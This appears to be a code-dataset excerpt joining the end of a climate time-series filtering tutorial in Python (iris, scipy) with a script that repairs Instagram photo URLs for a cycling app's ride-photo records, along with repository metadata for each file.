Filtering out everything happening on timescales longer than X years (where X is called upper_limit_years)
'''
upper_limit_years = 5.0
output_cube = cube.copy()
output_cube.data = high_pass_filter(cube.data,upper_limit_years)
timeseries3 = output_cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
plt.close('all')
qplt.plot(timeseries1 - np.mean(timeseries1.data),'r',alpha = 0.5,linewidth = 2)
qplt.plot(timeseries3 - np.mean(timeseries3.data),'b',alpha = 0.5,linewidth = 2)
plt.show(block = True)
'''
Filtering out everything happening on timescales longer than X years (where X is called upper_limit_years) but shorter than Y years (where Y is called lower_limit_years)
'''
upper_limit_years = 50.0
output_cube = cube.copy()
output_cube.data = high_pass_filter(cube.data,upper_limit_years)
lower_limit_years = 5.0
output_cube.data = low_pass_filter(output_cube.data,lower_limit_years)
timeseries4 = output_cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
plt.close('all')
qplt.plot(timeseries1 - np.mean(timeseries1.data),'r',alpha = 0.5,linewidth = 2)
qplt.plot(timeseries4 - np.mean(timeseries4.data),'y',alpha = 0.5,linewidth = 2)
plt.show(block = True)
'''
Hopefully this tells you everything you need. Just be aware that strange things can happen at the ends of the timeseries (just check it is doing something sensible)
'''
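# A self-contained sanity check of the same low-pass idea on synthetic data
# (no iris files needed); the values and names below are illustrative:
def _synthetic_check():
    t = np.arange(500.0)
    raw = np.sin(2*np.pi*t/100.0) + np.sin(2*np.pi*t/3.0)  # slow + fast component
    b, a = butter_bandpass(10.0, 'low')  # keep variability slower than ~10 steps
    smoothed = scipy.signal.filtfilt(b, a, raw)
    return smoothed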
|
[
"paul.halloran@gmail.com"
] |
paul.halloran@gmail.com
|
a031ad5ed05e689e5acac722ec476741ddb709b9
|
55d4e10ff2c71ac0f0042bda930d7e3dcc7a1a76
|
/freezing/web/scripts/fix_photo_urls.py
|
6950149827302ee3339431889337c9bc2382c8c6
|
[] |
no_license
|
freezingsaddles/freezing-legacy
|
28f813690b0c81d6a075fe2fc4ebe6d644ab7417
|
d2c0a445e189e0a359fa134258e0d5e14bd9de56
|
refs/heads/master
| 2021-05-09T11:24:56.219056
| 2018-01-23T16:25:57
| 2018-01-23T16:25:57
| 118,989,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,024
|
py
|
from instagram import InstagramAPIError
from freezing.model import meta
from freezing.model.orm import RidePhoto
from freezing.web.autolog import log
from freezing.web.scripts import BaseCommand
from freezing.web.utils.insta import configured_instagram_client
class FixPhotoUrls(BaseCommand):
@property
def name(self):
return 'sync-photos'
def build_parser(self):
parser = super(FixPhotoUrls, self).build_parser()
#
# parser.add_option("--rewrite", action="store_true", dest="rewrite", default=False,
# help="Whether to rewrite the ride photo data already in database.")
return parser
def execute(self, options, args):
# if options.rewrite:
# meta.engine.execute(model.RidePhoto.__table__.delete())
# meta.session_factory().query(model.Ride).update({"photos_fetched": False})
q = meta.session_factory().query(RidePhoto)
q = q.filter_by(img_t=None)
insta_client = configured_instagram_client()
del_q = []
for ride_photo in q:
self.logger.debug("Updating URLs for photo {}".format(ride_photo))
try:
media = insta_client.media(ride_photo.id)
ride_photo.img_l = media.get_standard_resolution_url()
ride_photo.img_t = media.get_thumbnail_url()
meta.session_factory().commit()
except InstagramAPIError as e:
if e.status_code == 400:
self.logger.error("Skipping photo {}; user is set to private".format(ride_photo))
del_q.append(ride_photo.id)
else:
self.logger.exception("Error fetching instagram photo {0} (skipping)".format(ride_photo))
if del_q:
meta.engine.execute(RidePhoto.__table__.delete().where(RidePhoto.id.in_(del_q)))
meta.session_factory().commit()
def main():
FixPhotoUrls().run()
if __name__ == '__main__':
main()
|
[
"hans@xmpl.org"
] |
hans@xmpl.org
|